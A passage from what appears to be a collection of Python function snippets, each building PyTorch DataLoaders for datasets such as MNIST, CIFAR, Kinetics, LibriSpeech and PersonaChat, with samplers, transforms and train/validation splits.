load_data(name):\n with open(name, 'rb') as f:\n data = pickle.load(f)\n num_types = 1 # There is no event type prediction, hence using a dummy value, this will basically be a constant value field\n return data, num_types\n\n print('[Info] Loading train data...')\n train_data, num_types = load_data(opt.data + 'train_ny.pkl')\n print('[Info] Loading dev data...')\n val_data, _ = load_data(opt.data + 'val_ny.pkl')\n print('[Info] Loading test data...')\n test_data, _ = load_data(opt.data + 'test_ny.pkl')\n\n trainloader = get_dataloader(train_data, opt.batch_size, shuffle=True)\n validationloader = get_dataloader(val_data, opt.batch_size, shuffle=True)\n testloader = get_dataloader(test_data, opt.batch_size, shuffle=False)\n return trainloader, validationloader, testloader, num_types", "def dataloader_msvd_train(args, tokenizer):\n\n msvd_dataset = MSVD_multi_sentence_dataLoader(\n subset=\"train\",\n data_path=args.data_path,\n features_path=args.features_path,\n max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(msvd_dataset)\n\n dataloader = DataLoader(\n msvd_dataset,\n batch_size=args.batch_size // args.n_gpu,\n num_workers=args.num_thread_reader,\n pin_memory=False,\n shuffle=(train_sampler is None),\n sampler=train_sampler,\n drop_last=True,\n )\n\n return dataloader, len(msvd_dataset), train_sampler", "def test_dataloader(self) -> DataLoader:\n return DataLoader(\n self.test_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=False,\n num_workers=multiprocessing.cpu_count(),\n )", "def build_dataloader(bs, shfle):\n # change get_labels to correct version (classification vs regression)\n dataset = TensorDataset(rand_data(), get_labels())\n dataset = TensorDataset(rand_data(), get_regression_labels())\n\n return DataLoader(dataset, batch_size=bs, shuffle=shfle, num_workers=0)", "def data_loader(data, train=True):\n\n loader_config = {\n 'batch_size':64,\n 'shuffle':train\n }\n \n return torch.utils.data.DataLoader(data, **loader_config)", "def get_dataloaders(logging, batch_size):\n # Load Data\n logging.info(\"Reading Train and Test data...\")\n train_df = pd.read_csv(\"C:/tmp/avila_classification/data/avila-tr.txt\", header=None)\n test_df = pd.read_csv(\"C:/tmp/avila_classification/data/avila-ts.txt\", header=None)\n\n # Fix column names\n col_names = ['col_' + str(j + 1) for j in range(train_df.shape[1] - 1)]\n indep_cols = col_names.copy()\n col_names.append('y')\n\n logging.debug(\"Assigning columns\")\n train_df.columns = col_names\n test_df.columns = col_names\n\n # Encode dependent variable column\n le = LabelEncoder()\n le.fit(train_df['y'])\n logging.debug(f\"Classes: {le.classes_}\")\n logging.debug(f\"Transformed Classes: {le.transform(le.classes_)}\")\n\n train_df['y_enc'] = le.transform(train_df['y'])\n test_df['y_enc'] = le.transform(test_df['y'])\n\n # train_df.head()\n logging.debug(f\"Shape of train data: {train_df.shape}\")\n logging.debug(f\"Shape of test data: {test_df.shape}\")\n\n # Create train and validation dataloaders\n train_ds = AvilaDataset(data_frame=train_df, indep_cols=indep_cols, dep_col='y_enc')\n valid_ds = AvilaDataset(data_frame=test_df, indep_cols=indep_cols, dep_col='y_enc')\n\n # Should be some exponent of 2 (128, 256)\n # batch_size = 256\n train_dl = DataLoader(train_ds, batch_size=batch_size, shuffle=True)\n valid_dl = DataLoader(valid_ds, batch_size=batch_size, shuffle=False)\n\n return train_dl, valid_dl, le", "def train_dataloader(self) -> data.DataLoader:\n # Random weighted sampler to approach the imbalanced dataset\n self.weights = [1.0 / i for i in self.weights]\n\n _sample_weights = [0] * len(self.datasets['train'])\n\n for idx, (_, label) in enumerate(self.datasets['train']):\n _weight = self.weights[label]\n _sample_weights[idx] = _weight\n\n random_sampler = data.WeightedRandomSampler(_sample_weights,\n len(self.datasets['train']), replacement=False)\n\n return data.DataLoader(dataset=self.datasets['train'], batch_size=self.batch_size,\n num_workers=self.num_workers, pin_memory=False,\n sampler=random_sampler)", "def get_loader(split):\n assert split in ['train', 'val', 'trainval', 'test']\n image_feature_path = config.rcnn_trainval_path if split != 'test' else config.rcnn_test_path\n dataset = VQAFeatureDataset(\n split,\n image_feature_path,\n )\n loader = torch.utils.data.DataLoader(\n dataset,\n batch_size=512,\n shuffle=True if split not in ['val', 'test'] else False, # only shuffle the data in training\n pin_memory=True,\n num_workers=config.workers,\n )\n return loader", "def get_dataloader(dataset, datadir, train_bs, test_bs, dataidxs=None, noise_level=0, net_id=None, total=0):\n if dataset in ('mnist', 'femnist', 'fmnist', 'cifar10','cifar100', 'svhn', 'generated', 'covtype', 'a9a', 'rcv1', 'SUSY','tinyimagenet'):\n if dataset == 'mnist':\n dl_obj = MNIST_truncated\n\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n elif dataset == 'femnist':\n dl_obj = FEMNIST\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n elif dataset == 'fmnist':\n dl_obj = FashionMNIST_truncated\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n elif dataset == 'svhn':\n dl_obj = SVHN_custom\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n\n\n elif dataset == 'cifar10':\n dl_obj = CIFAR10_truncated\n\n transform_train = transforms.Compose([\n transforms.ToTensor(),\n transforms.Lambda(lambda x: F.pad(\n Variable(x.unsqueeze(0), requires_grad=False),\n (4, 4, 4, 4), mode='reflect').data.squeeze()),\n transforms.ToPILImage(),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)\n ])\n # data prep for test set\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n AddGaussianNoise(0., noise_level, net_id, total)])\n \n elif dataset == 'cifar100':\n dl_obj = CIFAR100_truncated\n\n normalize = transforms.Normalize(mean=[0.5070751592371323, 0.48654887331495095, 0.4409178433670343],\n std=[0.2673342858792401, 0.2564384629170883, 0.27615047132568404])\n # transform_train = transforms.Compose([\n # transforms.RandomCrop(32),\n # transforms.RandomHorizontalFlip(),\n # transforms.ToTensor(),\n # normalize\n # ])\n transform_train = transforms.Compose([\n # transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n normalize\n ])\n # data prep for test set\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize])\n\n elif dataset == 'tinyimagenet': \n # random_ids = np.random.randint(1000, size=datasize)\n # train_indices = random_ids\n\n imagenet_mean = [0.485, 0.456, 0.406]\n imagenet_std = [0.229, 0.224, 0.225]\n\n train_dl = torch.utils.data.DataLoader(\n torchvision.datasets.ImageFolder(datadir +\"/train\",\n transform=transforms.Compose([\n transforms.Resize(32), \n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize(mean=imagenet_mean, std=imagenet_std)])),\n #Phuong 09/26 drop_last=False -> True\n batch_size=train_bs, drop_last=True)\n \n test_dl = torch.utils.data.DataLoader(\n torchvision.datasets.ImageFolder(datadir +\"/test\",\n transform=transforms.Compose([\n transforms.Resize(32), \n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize(mean=imagenet_mean, std=imagenet_std)])),\n #Phuong 09/26 drop_last=False -> True\n batch_size=test_bs, drop_last=True)\n\n return train_dl, test_dl, None, None\n\n\n else:\n dl_obj = Generated\n transform_train = None\n transform_test = None\n\n\n train_ds = dl_obj(datadir, dataidxs=dataidxs, train=True, transform=transform_train, download=True)\n test_ds = dl_obj(datadir, train=False, transform=transform_test, download=True)\n\n train_dl = data.DataLoader(dataset=train_ds, batch_size=train_bs, shuffle=True, drop_last= dataset in ['cifar100'])\n test_dl = data.DataLoader(dataset=test_ds, batch_size=test_bs, shuffle=False, drop_last=False)\n\n return train_dl, test_dl, train_ds, test_ds", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def get_dataloader(self):\n shuffle = True if self.mode == \"train\" else False\n return DataLoader(self.get_dataset(), batch_size=self.batch_size, shuffle = shuffle, \n collate_fn=create_mini_batch)", "def dataloaders():\n # train data path\n data_train = '../dataset/train/'\n # set transformations\n train_transforms = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n \n train_data = datasets.ImageFolder(data_train, transform = train_transforms)\n trainloader = torch.utils.data.DataLoader(train_data, batch_size = 16, shuffle = True)\n \n return trainloader", "def get_data_loader(batch_size=10, num_workers=2):\n \n data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=num_workers,\n collate_fn=collate)\n return data_loader", "def get_dataloader(dataset, batchsize):\n\n train_set_size = int(0.8 * dataset.__len__())\n train_indices = np.random.choice(np.arange(dataset.__len__()),\n train_set_size, replace=False)\n train_sampler = SubsetRandomSampler(train_indices)\n\n val_indices = np.setdiff1d(np.arange(dataset.__len__()),\n train_indices, assume_unique=True)\n val_sampler = SubsetRandomSampler(val_indices)\n\n trainloader = DataLoader(dataset, batch_size=batchsize,\n sampler=train_sampler, num_workers=2)\n valloader = DataLoader(dataset, batch_size=batchsize,\n sampler=val_sampler, num_workers=2)\n\n return trainloader, valloader", "def data_loader(root, batch_size=64):\n input_transform = get_transform()\n dataset = CustomDataset(root, input_transform)\n return data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=False)", "def get_train_loader(batch_size, train_set, train_sampler):\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, sampler=train_sampler, num_workers=4)\n\n return train_loader", "def _custom_data_loader(self) -> DataLoader:\n dataloaders = DataLoader(self.dataset, batch_size=1)\n return dataloaders", "def get_loader(data, json, batch_size, shuffle, num_workers):\n dataset = FinNumDataset(data, json)\n\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate_fn)\n return data_loader", "def test_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def build_training_data_loader(self) -> DataLoader:\n pass", "def data_loader(\n self, batch_size: int = 1, iter_steps: int = 0, batch_as_list: bool = True\n ) -> DataLoader:\n data = self.data\n datasets = []\n\n for _, dat in data.items():\n datasets.append(dat.dataset())\n\n if len(datasets) < 1:\n raise FileNotFoundError(\n \"no datasets available for this model to create a loader from\"\n )\n\n return DataLoader(\n *datasets,\n batch_size=batch_size,\n iter_steps=iter_steps,\n batch_as_list=batch_as_list,\n )", "def get_data_loaders(args, tokenizer):\n personachat = get_dataset(tokenizer, args.dataset_path, args.dataset_cache, args.train_lang)\n _ = personachat.pop(\"test\", None)\n logger.info(\"Build inputs and labels\")\n datasets = {\"train\": [], \"valid\": []}\n\n if args.train_lang in [\"En\", \"Fr\", \"It\", \"Id\", \"Jp\", \"Ko\", \"Zh\"]: #monolingual data\n for dataset_name, dataset in personachat.items():\n for dial in dataset[args.train_lang]: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lm_labels = True)\n datasets[dataset_name].append(instance) \n else: #multilingual data\n for dataset_name, dataset in personachat.items():\n for lang, dials in dataset.items():\n for dial in dials: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lang_id=\"<{}>\".format(lang.lower()), lm_labels = True)\n datasets[dataset_name].append(instance) #all langs together\n\n\n logger.info(\"Build train and validation dataloaders\")\n train_dataset = DatasetTrain(datasets[\"train\"])\n valid_dataset = DatasetTrain(datasets[\"valid\"])\n\n #logger.info(\"Build train and validation dataloaders\")\n #train_dataset, valid_dataset = TensorDataset(*tensor_datasets[\"train\"]), TensorDataset(*tensor_datasets[\"valid\"])\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None\n valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None\n train_loader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size, shuffle=(not args.distributed), collate_fn=collate_fn)\n valid_loader = DataLoader(valid_dataset, sampler=valid_sampler, batch_size=args.valid_batch_size, shuffle=False, collate_fn=collate_fn)\n\n # logger.info(\"Train dataset (Batch, Candidates, Seq length): {}\".format(train_dataset.tensors[0].shape))\n # #logger.info(\"Train dataset (Batch, Candidates, Seq length): {}\".format(train_dataset.tensors[1].shape))\n # logger.info(\"Valid dataset (Batch, Candidates, Seq length): {}\".format(valid_dataset.tensors[0].shape))\n logger.info(\"Train dataset length: {}\".format(len(train_dataset)))\n logger.info(\"Valid dataset length: {}\".format(len(valid_dataset)))\n return train_loader, valid_loader, train_sampler, valid_sampler", "def _init_al_dataset(self):\n\n self._init_dataset()\n\n train_dataset = self.datasets['train']\n\n dataset_size = len(train_dataset)\n self.budget = math.ceil(self.budget_frac*dataset_size)\n Sampler.__init__(self, config, self.budget) # TODO: Weird place to initialise this\n\n all_indices = set(np.arange(dataset_size))\n k_initial = math.ceil(len(all_indices)*self.initial_budget_frac)\n initial_indices = random.sample(list(all_indices), k=k_initial)\n\n sampler_init = data.sampler.SubsetRandomSampler(initial_indices) # need to sample from training dataset\n\n self.labelled_dataloader = data.DataLoader(train_dataset, sampler=sampler_init, batch_size=self.batch_size, drop_last=True)\n self.val_dataloader = data.DataLoader(self.datasets['valid'], batch_size=self.batch_size, drop_last=False)\n self.test_dataloader = data.DataLoader(self.datasets['test'], batch_size=self.batch_size, drop_last=False)\n\n return all_indices, initial_indices", "def get_dataloaders(args):\n if args.dataset == 'heat':\n dataset_class = heat.HeatDiffusionDataset\n else:\n raise ValueError(f'Unknown dataset {args.dataset}')\n train_dataset = dataset_class(\n dataset_class.get_train_path(args.data_path), args, train=True)\n if args.dist:\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_dataset)\n else:\n train_sampler = torch.utils.data.RandomSampler(train_dataset)\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, num_workers=args.workers,\n sampler=train_sampler, pin_memory=True, drop_last=args.drop_last)\n if not args.no_eval:\n validation_dataset = dataset_class(\n dataset_class.get_validation_path(args.data_path), args, train=False)\n if args.dist:\n validation_sampler = torch.utils.data.distributed.DistributedSampler(\n validation_dataset, shuffle=False)\n else:\n validation_sampler = torch.utils.data.SequentialSampler(\n validation_dataset)\n validation_loader = torch.utils.data.DataLoader(\n validation_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=validation_sampler,\n pin_memory=True, drop_last=args.drop_last)\n\n test_dataset = dataset_class(\n dataset_class.get_test_path(args.data_path), args, train=False)\n if args.dist:\n test_sampler = torch.utils.data.distributed.DistributedSampler(\n test_dataset, shuffle=False)\n else:\n test_sampler = torch.utils.data.SequentialSampler(\n test_dataset)\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=test_sampler,\n pin_memory=True, drop_last=args.drop_last)\n else:\n validation_loader = None\n test_loader = None\n\n # Update the data shape if needed.\n if args.data_shape is None:\n args.data_shape = train_dataset.get_shape()\n if args.data_target_shape is None:\n args.data_target_shape = train_dataset.get_target_shape()\n\n return train_loader, validation_loader, test_loader", "def create_dataset_sampler_loader(file_path, cuda, batch_size, hvd):\n # When supported, use 'forkserver' to spawn dataloader workers\n # instead of 'fork' to prevent issues with Infiniband implementations\n # that are not fork-safe.\n kwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}\n if (kwargs.get('num_workers', 0) > 0 and hasattr(mp, '_supports_context')\n and 'forkserver' in mp.get_all_start_methods()):\n kwargs['multiprocessing_context'] = 'forkserver'\n\n # create dataset\n dataset = MNISTDataset(file_path)\n # Horovod: use DistributedSampler to partition the training data\n sampler = Data.distributed.DistributedSampler(\n dataset, num_replicas=hvd.size(), rank=hvd.rank())\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, sampler=sampler, **kwargs)\n return dataset, sampler, loader", "def to_DataLoader(self, **kwargs):\r\n return DataLoader(self, **kwargs)", "def data_creator(config):\n train_dataset, val_dataset = LinearDataset(2, 5), LinearDataset(2, 5)\n train_loader = DataLoader(train_dataset, batch_size=config[\"batch_size\"])\n val_loader = DataLoader(val_dataset, batch_size=config[\"batch_size\"])\n return train_loader, val_loader", "def make_dataloaders(params):\r\n transform_train = transforms.Compose([transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465],\r\n [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor()])\r\n\r\n trainset = torchvision.datasets.CIFAR10(root=params['path'], train=True, transform=transform_train)\r\n testset = torchvision.datasets.CIFAR10(root=params['path'], train=False, transform=transform_validation)\r\n\r\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=params['batch_size'], shuffle=True, num_workers=4)\r\n testloader = torch.utils.data.DataLoader(testset, batch_size=params['batch_size'], shuffle=False, num_workers=4)\r\n return trainloader, testloader", "def load_data(batch_size=batch_size):\n trainset = LibriSpeechDataset(training_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds))\n testset = LibriSpeechDataset(validation_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds), stochastic=False)\n\n train_loader = DataLoader(trainset, batch_size=batch_size, num_workers=1, shuffle=True, drop_last=True)\n test_loader = DataLoader(testset, batch_size=1, num_workers=1, drop_last=True)\n\n return train_loader, test_loader", "def initialize_dataloaders(\n self, X: Union[np.ndarray, pd.DataFrame], y: Union[np.ndarray, np.array]\n ):\n training_design_matrix, training_targets_array, validation_design_matrix, validation_targets_array = self.generate_training_validation_split(\n X, y\n )\n training_dataloader_kwargs = {\n \"design_matrix\": training_design_matrix,\n \"targets_array\": training_targets_array,\n \"data_type\": self.data_type,\n \"batch_size\": self.batch_size,\n \"shuffle\": self.shuffle_training_examples,\n }\n validation_dataloader_kwargs = {\n \"design_matrix\": validation_design_matrix,\n \"targets_array\": validation_targets_array,\n \"data_type\": self.data_type,\n \"batch_size\": self.batch_size,\n \"shuffle\": False,\n }\n self.training_dataloader = self.generate_dataloader(**training_dataloader_kwargs)\n self.validation_dataloader = self.generate_dataloader(**validation_dataloader_kwargs)", "def get_dataloaders(data_dir,train_batch_size,val_batch_size,aug_flag):\n # Create the dataset object.\n transformed_dataset = PersonDataset(data_dir,False)\n # dataloader for train and validation\n validation_split = 0.2\n shuffle_dataset = True\n #random seed to keep the train-val split constant for inference purpose\n random_seed= 42\n # create indices for training and validation splits.\n dataset_size = len(transformed_dataset)\n # we create the indices using python range function and store it into a list\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split*dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices,val_indices = indices[split:],indices[:split]\n # create dataloaders...\n train_sampler = SubsetRandomSampler(train_indices)\n val_sampler = SubsetRandomSampler(val_indices)\n train_aug,val_aug = aug_flag,False\n train_loader = DataLoader(PersonDataset(data_dir,train_aug), batch_size=train_batch_size, shuffle=False, num_workers=0,sampler = train_sampler)\n val_loader = DataLoader(PersonDataset(data_dir,val_aug), batch_size=val_batch_size, shuffle=False, num_workers=0,sampler = val_sampler)\n\n # dictionary for data loaders..\n dataloaders = {\"train\" :train_loader,\n \"val\":val_loader\n }\n return dataloaders", "def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n loader = DataLoader(TorchData(dataset),\n batch_size=batch_size,\n shuffle=shuffle,\n **kwargs)\n return loader", "def get_dataloader(data_folder, model_name, data_name, size=\"default\"):\n training_set = None\n validation_set = None\n\n if model_name == \"Howe_Patterson\":\n if data_name == \"combined\":\n partition = []\n for data_fold in data_folder:\n partition.append(load_obj(os.path.join(data_fold, 'data_partition.pkl')))\n\n elif size == \"small\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_small.pkl'))\n elif size == \"tiny\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_tiny.pkl'))\n else:\n partition = load_obj(os.path.join(data_folder, 'data_partition.pkl'))\n\n\n if data_name == \"SHHS\":\n training_set = Dataset_full_SHHS(partition['train'], data_folder)\n validation_set = Dataset_full_SHHS(partition['validation'], data_folder)\n elif data_name == \"snooze\":\n training_set = Dataset_full(partition['train'], data_folder)\n validation_set = Dataset_full(partition['validation'], data_folder)\n elif data_name == \"philips\":\n training_set = Dataset_Philips_full(partition['train'], data_folder)\n validation_set = Dataset_Philips_full(partition['validation'], data_folder)\n elif data_name == \"HMC\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"combined\":\n training_set = ConcatDataset(\n Dataset_full(partition[0]['train'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['train'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n validation_set = ConcatDataset(\n Dataset_full(partition[0]['validation'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['validation'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n else:\n print(\"{} wrong data for dataloader\".format(data_name))\n exit()\n elif model_name == \"Deep_Sleep\":\n if data_name == \"combined\":\n partition = []\n for data_fold in data_folder:\n partition.append(load_obj(os.path.join(data_fold, 'data_partition.pkl')))\n\n elif size == \"small\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_small.pkl'))\n elif size == \"tiny\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_tiny.pkl'))\n else:\n partition = load_obj(os.path.join(data_folder, 'data_partition.pkl'))\n\n if data_name == \"SHHS\":\n training_set = Dataset_full_SHHS(partition['train'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n validation_set = Dataset_full_SHHS(partition['validation'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n elif data_name == \"snooze\":\n training_set = Dataset_full(partition['train'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n validation_set = Dataset_full(partition['validation'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n elif data_name == \"philips\":\n training_set = Dataset_Philips_full(partition['train'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n validation_set = Dataset_Philips_full(partition['validation'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n elif data_name == \"HMC\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"combined\":\n # TODO combined dataset https://discuss.pytorch.org/t/train-simultaneously-on-two-datasets/649/17\n training_set = ConcatDataset(\n Dataset_full(partition[0]['train'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['train'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n validation_set = ConcatDataset(\n Dataset_full(partition[0]['validation'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['validation'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n else:\n print(\"{} wrong data for dataloader\".format(data_name))\n exit()\n elif model_name == \"ConvNet_IID\":\n if data_name == \"combined\":\n partition = []\n for data_fold in data_folder:\n partition.append(load_obj(os.path.join(data_fold, 'data_partition_IID_windows.pkl')))\n else:\n partition = load_obj(os.path.join(data_folder, 'data_partition_IID_windows.pkl'))\n if data_name == \"SHHS\":\n training_set = Dataset_IID_window_SHHS(partition['train'], data_folder)\n validation_set = Dataset_IID_window_SHHS(partition['validation'], data_folder)\n elif data_name == \"snooze\":\n training_set = Dataset_IID_window(partition['train'], data_folder)\n validation_set = Dataset_IID_window(partition['validation'], data_folder)\n elif data_name == \"philips\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"HMC\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"combined\":\n training_set = ConcatDataset(\n Dataset_IID_window(partition[0]['train'], data_folder[0]),\n Dataset_IID_window_SHHS(partition[1]['train'], data_folder[1]))\n validation_set = ConcatDataset(\n Dataset_IID_window(partition[0]['validation'], data_folder[0]),\n Dataset_IID_window_SHHS(partition[1]['validation'], data_folder[1]))\n else:\n print(\"{} wrong data for dataloader\".format(data_name))\n exit()\n\n else:\n print(\"{} wrong model for dataloader\".format(model_name))\n exit()\n\n return training_set, validation_set", "def get_loader(\n data_source: Iterable[dict],\n open_fn: Callable,\n dict_transform: Callable = None,\n sampler=None,\n collate_fn: Callable = default_collate_fn,\n batch_size: int = 32,\n num_workers: int = 4,\n shuffle: bool = False,\n drop_last: bool = False,\n):\n from catalyst.data.dataset import ListDataset\n\n dataset = ListDataset(\n list_data=data_source, open_fn=open_fn, dict_transform=dict_transform,\n )\n loader = torch.utils.data.DataLoader(\n dataset=dataset,\n sampler=sampler,\n collate_fn=collate_fn,\n batch_size=batch_size,\n num_workers=num_workers,\n shuffle=shuffle,\n pin_memory=torch.cuda.is_available(),\n drop_last=drop_last,\n )\n return loader", "def val_dataloader(self):\r\n val_dataset = pv.data.Kinetics(\r\n data_path=os.path.join(self._DATA_PATH, \"val\"),\r\n clip_sampler=pv.data.make_clip_sampler(\"uniform\", self._CLIP_DURATION),\r\n decode_audio=False,\r\n )\r\n return torch.utils.data.DataLoader(\r\n val_dataset,\r\n batch_size=self._BATCH_SIZE,\r\n num_workers=self._NUM_WORKERS,\r\n )", "def create_dataloaders(data_dir):\n\n trng_dataset = datasets.ImageFolder(data_dir / TRNG_FOLDER,\n transform=flowernet.trng_transform)\n trng_dataloader = torch.utils.data.DataLoader(trng_dataset,\n batch_size=64,\n shuffle=True)\n\n valn_dataset = datasets.ImageFolder(data_dir / VALN_FOLDER,\n transform=flowernet.pred_transform)\n valn_dataloader = torch.utils.data.DataLoader(valn_dataset,\n batch_size=64,\n shuffle=True)\n\n return trng_dataloader, valn_dataloader", "def loadData(self):\n batch_size = 256\n \n #if self.conv_sg == True:\n # batch_size = 1 \n \n download = True\n root = self.root + self.dataset\n if self.dataset == \"MNIST\": \n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n trainset = torchvision.datasets.MNIST(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.MNIST(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR10\":\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465,), (0.2023, 0.1994, 0.2010,))])\n trainset = torchvision.datasets.CIFAR10(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR10(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR100\":\n transform = transforms.Compose([transforms.ToTensor()])\n trainset = torchvision.datasets.CIFAR100(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR100(root, train=False, download=download, transform=transform)\n \n \n trainloader = torch.utils.data.DataLoader(trainset, batch_size = batch_size,\n shuffle=False, num_workers=0, pin_memory = False)\n \n testloader = torch.utils.data.DataLoader(testset, batch_size= batch_size,\n shuffle=False, num_workers=2, pin_memory = False)\n \n return trainloader, testloader", "def train_dataloader(self, batch_size: Optional[int] = None) -> DataLoader:\n dataset = TabularDataset(\n task=self.config.task,\n data=self.train,\n categorical_cols=self.config.categorical_cols,\n continuous_cols=self.config.continuous_cols,\n embed_categorical=(not self.do_leave_one_out_encoder()),\n target=self.target,\n )\n return DataLoader(\n dataset,\n batch_size if batch_size is not None else self.batch_size,\n shuffle=True if self.train_sampler is None else False,\n num_workers=self.config.num_workers,\n sampler=self.train_sampler,\n pin_memory=self.config.pin_memory,\n )", "def create_val_dataloader(configs, mode):\n val_sampler = None\n val_dataset = KittiDataset(configs, mode=mode, lidar_aug=None, hflip_prob=0., num_samples=configs.num_samples)\n if configs.distributed:\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False)\n val_dataloader = DataLoader(val_dataset, batch_size=configs.batch_size, shuffle=False,\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=val_sampler)\n\n return val_dataloader", "def load_dataset():\n\n\n train_dd_loader = DailyDialogLoader(PATH_TO_TRAIN_DATA, load=False)\n train_dataloader = DataLoader(train_dd_loader, batch_size=16, shuffle=True, num_workers=0,\n collate_fn=PadCollate())\n\n test_dd_loader = DailyDialogLoader(PATH_TO_TEST_DATA, load=True)\n test_dataloader = DataLoader(test_dd_loader, batch_size=1, shuffle=False, num_workers=0,\n collate_fn=PadCollate())\n\n assert train_dd_loader.vocabulary.n_words == test_dd_loader.vocabulary.n_words\n\n return train_dd_loader, train_dataloader, 